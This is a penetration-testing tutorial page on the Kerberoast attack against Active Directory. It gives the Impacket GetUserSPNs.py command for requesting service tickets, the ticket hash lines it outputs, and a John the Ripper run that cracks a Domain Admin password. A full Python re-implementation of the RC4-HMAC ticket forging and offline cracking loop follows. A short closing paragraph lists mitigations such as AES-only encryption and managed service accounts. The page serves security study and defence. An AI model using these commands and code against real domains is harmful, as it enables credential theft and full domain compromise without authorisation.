
Kerberoast Attack

This page deals with compromising an Active Directory domain with the Kerberoast attack.


Last updated 5 years ago

Introduction

For several reasons, it is very common in Active Directory environments to find services running under domain administrator accounts. A Service Principal Name (SPN) binds a service instance to the account it runs as; when that account is a user account, every Kerberos service ticket issued for the SPN is encrypted with a key derived from that user's password.

SPN listing
ServicePrincipalName                Name        MemberOf                                          PasswordLastSet
----------------------------------  ----------  ------------------------------------------------  -------------------
http/win10.sittingduck.info         uberuser    CN=Domain Admins,CN=Users,DC=sittingduck,DC=info  2015-11-10 23:47:21
MSSQLSvc/WIN2K8R2.sittingduck.info  sqladmin01                                                    2016-05-13 19:13:20

Any authenticated domain user can request a service ticket (TGS) for such an SPN: the KDC issues it without checking whether the requester is actually allowed to use the service. Because the ticket is encrypted with the service account's key (for RC4-HMAC, etype 23, that key is simply the account's NT hash), the ticket can be taken offline and guessed against a wordlist until the checksum verifies, which reveals the service account's cleartext password. Nothing is sent to the service itself and no failed logons are generated, so the attack does not trigger account lockouts.

If the attack succeeds against an account such as uberuser above, the attacker compromises the whole Active Directory domain. It only works against weak or guessable passwords: machine accounts have long random passwords and are not worth targeting, and tickets encrypted with AES (etype 17/18) are far slower to crack than RC4 ones.

Request SPNs Tickets

Use Impacket's GetUserSPNs.py with the credentials of any domain user. It queries LDAP for user accounts that have a servicePrincipalName set and, with -request, asks the KDC for a service ticket for each of them, printing the tickets in John the Ripper's krb5tgs format:

root@wpad:~/impacket/examples# ./GetUserSPNs.py -request sittingduck.info/notanadmin
Impacket v0.9.15-dev - Copyright 2002-2016 Core Security Technologies

Password:
ServicePrincipalName                Name        MemberOf                                          PasswordLastSet
----------------------------------  ----------  ------------------------------------------------  -------------------
http/win10.sittingduck.info         uberuser    CN=Domain Admins,CN=Users,DC=sittingduck,DC=info  2015-11-10 23:47:21
MSSQLSvc/WIN2K8R2.sittingduck.info  sqladmin01                                                    2016-05-13 19:13:20

$krb5tgs$23$*sqladmin01$SITTINGDUCK.INFO$SPN*$6e5307df490c6e3339f613fdc5655785$80ba233b4d24531202f2e354c99e7eda807bde7aeeb48ee4cdb6bf809d78652413699e3cff8b9b78b9ee70e997a538155fc7f72e208d715020d458b8413d4b12b212738833c4694d84937d65cb8ecd0020c00a5d39c07da35a748ea2cb062fca4fa9b282e7046d70ee1cae4cfee7d6f791052e283
$krb5tgs$23$*uberuser$SITTINGDUCK.INFO$SPN*$27c08ed2a8d5394f66e8c13c25c98393$310b787ec5c10b20fcc0acb1406b6a6e2ffddd71de3dc4c70c19e5dfcf262cc88574e61cb3940ebfd574b2bb555f2b05f84d8526e3cf46fc0ca57e03467729757cbf79da9f55cde9dabdda68e80dce6564e9f1b904b0585dbc813b82abf89e973e41c102b664f4c649f85acaf7904a273dddcb9315a66f27334f313190e1caf4f5055b671d250f5912cc1871a1dd4a6126087ddfb98ade8f7dde495ee8ad76583aa5a12eef63a690dd82a15eaaca0d7594f2f1dbc899035d89dd628b291590058cfb3405d1dfe4a383be5704465d9c8972ef8f1cba3541fdfa7dcf5063eaed74051fa18bd73f7b4f7d77

uberuser belongs to the Domain Admins group (see the MemberOf column), so cracking its ticket yields a domain administrator password. Each $krb5tgs$23$ line carries the account, the realm, a 16-byte checksum and the encrypted ticket body, which is all the cracker needs.

Crack Tickets

John the Ripper only supports the krb5tgs format in its jumbo (magnumripper) build, so install that version first. Save the $krb5tgs$ lines printed by GetUserSPNs.py to a file and run John against it with a wordlist (hashcat mode 13100 accepts the same lines):

root@wpad:~/johntheripper/run# ./john /tmp/johnkirb.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 11 password hashes with 11 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Warning: OpenMP is disabled; a non-OpenMP build may be faster
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 3.35% (ETA: 23:38:44) 0g/s 69751p/s 767263c/s 767263C/s 129700..123junior
ASDqwe123        ($krb5tgs$unkown)
ASDqwe123        ($krb5tgs$unkown)

Kerberoasting is an efficient way to recover a domain administrator password, and with it the Active Directory domain, from nothing more than a low-privileged domain account. The defensive counterparts follow directly: do not run services under Domain Admins, give service accounts long random passwords (or use group Managed Service Accounts), and restrict them to AES encryption so that RC4 tickets are never issued for them.
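To make explicit what John does with each $krb5tgs$23$ line from the two steps above, the following is an added worked example; it is not code from the original page, from Impacket or from John. It re-implements the RC4-HMAC (etype 23) check in pure Python: it forges a ticket for a constructed service account under a known password, then runs the same derive-decrypt-verify loop over a constructed wordlist. The account name, realm, SPN, password and wordlist are made up, and the plaintext is a placeholder standing in for the ASN.1 EncTicketPart a real KDC would encrypt. It assumes key usage number 2 for the ticket enc-part, which is what the krb5tgs format relies on.

```python
import hmac
import os
import struct
from hashlib import md5
from typing import Iterable, Optional

MASK = 0xFFFFFFFF
# Key usage number for the ticket enc-part of a TGS-REP (RFC 4120); the $krb5tgs$23$
# format assumes it, as do John's krb5tgs format and hashcat mode 13100.
TICKET_KEY_USAGE = 2


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python, so the NT hash works without OpenSSL's legacy provider."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    R2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    R3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(48):
            if i < 16:
                f, k, s, t = F(b, c, d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:
                f, k, s, t = G(b, c, d), R2[i - 16], (3, 5, 9, 13)[i % 4], 0x5A827999
            else:
                f, k, s, t = H(b, c, d), R3[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            v = (a + f + X[k] + t) & MASK
            a, b, c, d = d, ((v << s) | (v >> (32 - s))) & MASK, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 over the UTF-16LE password; for etype 23 this is the Kerberos key itself."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (encryption and decryption are the same operation)."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, md5).digest()


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes) -> "tuple[bytes, bytes]":
    """RFC 4757 RC4-HMAC encryption as the KDC applies it to a ticket: returns (checksum, ciphertext)."""
    k1 = hmac_md5(key, struct.pack("<I", TICKET_KEY_USAGE))
    data = confounder + plaintext      # 8-byte random confounder prepended to the plaintext
    checksum = hmac_md5(k1, data)      # the 16-byte hex field that precedes the edata in $krb5tgs$
    k3 = hmac_md5(k1, checksum)
    return checksum, rc4(k3, data)


def forge_hashline(user: str, realm: str, spn: str, password: str) -> str:
    """Build a $krb5tgs$23$ line for a constructed account, standing in for GetUserSPNs.py output."""
    # The real plaintext is the ASN.1 EncTicketPart; any bytes will do to show the cracking step.
    plaintext = b"EncTicketPart placeholder for " + spn.encode()
    checksum, edata = rc4_hmac_encrypt(nt_hash(password), plaintext, os.urandom(8))
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def crack_krb5tgs(hashline: str, wordlist: Iterable[str]) -> Optional[str]:
    """The offline guess loop: derive the key from each candidate, decrypt, verify the HMAC."""
    parts = hashline.split("$")        # checksum and edata are the last two '$'-separated fields
    checksum, edata = bytes.fromhex(parts[-2]), bytes.fromhex(parts[-1])
    usage = struct.pack("<I", TICKET_KEY_USAGE)
    for candidate in wordlist:
        k1 = hmac_md5(nt_hash(candidate), usage)
        k3 = hmac_md5(k1, checksum)
        if hmac_md5(k1, rc4(k3, edata)) == checksum:   # only the right key reproduces the checksum
            return candidate
    return None


if __name__ == "__main__":
    # Constructed account, SPN, password and wordlist; nothing here comes from a real domain.
    line = forge_hashline("sqladmin01", "SITTINGDUCK.INFO", "MSSQLSvc/WIN2K8R2.sittingduck.info", "Summer2016!")
    print(line[:70] + "...")
    print("cracked:", crack_krb5tgs(line, ["123456", "Password1", "Summer2016!"]))   # Summer2016!
```

The loop is why the attack is cheap: each guess costs one MD4, three HMAC-MD5 calls and one RC4 pass, with no salt and no iteration count, which is exactly what lets John report tens of thousands of candidates per second above. An AES ticket would instead require a PBKDF2 derivation with 4096 iterations per guess, which is the reason the AES-only mitigation matters.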

References

  • Impacket: https://github.com/fortra/impacket
  • John The Ripper (jumbo build, which carries the krb5tgs format): https://github.com/openwall/john
  • mubix's blog: https://room362.com